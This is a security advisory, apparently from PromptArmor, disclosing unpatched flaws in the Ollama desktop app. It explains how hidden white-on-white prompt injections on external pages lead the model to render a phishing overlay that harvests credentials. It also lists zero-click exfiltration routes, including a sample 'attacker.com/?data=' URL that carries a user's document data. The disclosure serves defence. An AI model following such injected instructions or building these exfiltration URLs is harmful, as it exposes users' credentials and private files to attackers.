# Unpatched Ollama Vulnerabilities: Phishing Overlays and Data Exfiltration > Source: > Published: 2026-05-29 17:20:35+00:00 Threat Intelligence Table of Content # Unpatched Ollama Vulnerabilities: Phishing Overlays and Data Exfiltration Ollama’s desktop app is vulnerable to phishing overlay and data exfiltration attacks via indirect prompt injection, overwriting the app with an attacker’s site. [Context](#context) Ollama is a leading tool for leveraging AI models, with over 170,000 stars on GitHub. Multiple vulnerabilities in the desktop app have been identified, enabling phishing and data exfiltration attacks. The entire Ollama desktop interface can be overwritten by an attacker-controlled website via an indirect prompt-injection attack due to insecure rendering of model outputs. **Three zero-click data exfiltration vectors exploitable via indirect prompt injection were also identified.** *Note: No human-in-the-loop approval steps are required for any attacks in this article.* These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly. [The Attack Chain](#the-attack-chain) [The user asks Ollama about an external website or externally-sourced file](#the-user-asks-ollama-about-an-external-website-or-externally-sourced-file)[A prompt injection is hidden on the external site in 1 pt font white-on-white text](#a-prompt-injection-is-hidden-on-the-external-site-in-1-pt-font-white-on-white-text) [The AI model is manipulated to output malicious HTML, overwriting the user interface with an attacker-controlled website](#the-ai-model-is-manipulated-to-output-malicious-html-overwriting-the-user-interface-with-an-attacker-controlled-website)The AI model is manipulated to believe it must output an HTML element as part of its explanation to the user. *Note: Quitting and re-opening Ollama does not close the malicious overlay.*[The attacker logs the credentials entered into the malicious overlay](#the-attacker-logs-the-credentials-entered-into-the-malicious-overlay) [Data Exfiltration Attacks](#data-exfiltration-attacks) In addition to the phishing risk noted above, three zero-click data exfiltration vectors that are exploitable via indirect prompt injection were identified. Data exfiltration via insecure web search tooling Data exfiltration via insecure rendering of Markdown image outputs Data exfiltration via insecure rendering of external HTML elements Below is a data exfiltration attack chain that weaponizes insecure web search tooling: *Note: This attack uses the same malicious website, but with a different prompt injection.* [A data source with a prompt injection is ingested (website, document, etc.)](#a-data-source-with-a-prompt-injection-is-ingested-(website-document-etc.))[AI is manipulated to access a malicious URL, exfiltrating data from documents the user has been working with](#ai-is-manipulated-to-access-a-malicious-url-exfiltrating-data-from-documents-the-user-has-been-working-with)The model is manipulated to construct a URL using the attacker’s domain, with data from the victim’s previously uploaded documents stored in query parameters. *attacker.com/?data={AI puts the user’s data here}*[The attacker’s server logs the model’s request, including the victim’s data](#the-attacker’s-server-logs-the-model’s-request-including-the-victim’s-data) [Responsible Disclosure](#responsible-disclosure) These vulnerabilities were reported to the Ollama team on Dec 18, 2025, but no response was received despite four additional follow-ups. To ensure users are aware of these risks, this report is being disclosed publicly. [Timeline](#timeline) Dec 18, 2025 PromptArmor discloses to Ollama Jan 20, 2026 PromptArmor follows up Jan 26, 2026 PromptArmor follows up Jan 29, 2026 PromptArmor follows up Feb 19, 2026 PromptArmor follows up May 28, 2026 Article published